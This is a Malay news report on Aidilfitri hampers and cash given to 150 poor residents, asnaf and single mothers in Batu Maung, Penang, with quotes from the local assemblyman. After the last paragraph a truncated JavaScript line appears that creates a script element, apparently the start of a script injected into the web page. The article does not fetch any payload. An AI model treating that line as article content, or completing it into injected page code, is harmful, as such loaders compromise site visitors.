Asnaf, fakir miskin KADUN Batu Maung terima sumbangan Aidilfitri

BAYAN LEPAS – Seramai 150 penerima memperoleh sumbangan sempena Aidilfitri pada Majlis Penyampaian Sumbangan Aidilfitri & Majlis Berbuka Puasa bagi kawasan Dewan Undangan Negeri (KADUN) Batu Maung yang diadakan di Masjid Jamek Sungai Tiram di sini baru-baru ini.

Pada majlis yang dianjurkan oleh Pusat Khidmat Ahli Dewan Undangan Negeri (ADUN) Batu Maung itu, para penerima menerima sebuah hamper berupakan makanan asas seperti bihun, mi segera, makanan dalam tin, minuman coklat, gula, kordial, teh dan biskut serta duit raya.

ADUNnya, Dato’ Abdul Malik Abul Kassim berkata, sumbangan yang disumbangkan itu adalah bukti keprihatinan Kerajaan Negeri terhadap mereka yang memerlukan terutama golongan yang berpendapatan rendah, fakir dan miskin serta ibu tunggal.

 “Setiap tahun sejak tujuh tahun lalu, di bawah KADUN Batu Maung, kami akan memilih antara 100 hingga 150 orang dalam kalangan asnaf, orang miskin, ibu tunggal dan berkelayakan sebagai penerima.

“Tujuannya mudah, untuk meringankan beban yang ditanggung dan berkongsi kegembiraan menjelang hari raya.

“Rata-rata penerima melahirkan rasa syukur dan berterima kasih dengan sumbangan yang diberikan terutama ketika menjelangnya Aidilfitri, sekurang-kurangnya dapatlah meringankan beban yang ditanggung,” ucapnya yang juga merupakan Exco Hal Ehwal Agama, Perdagangan Dalam Negeri dan Hal Ehwal Pengguna pada majlis berkaitan di sini baru-baru ini.

Yang di-Pertua Negeri (TYT), Tun Dr. Abdul Rahman Abbas hadir menyempurnakan majlis penyampaian sumbangan serta turut meluangkan masa berbuka puasa dan menunaikan solat maghrib berjemaah.

var d=document;var s=d.createElement(‘script’);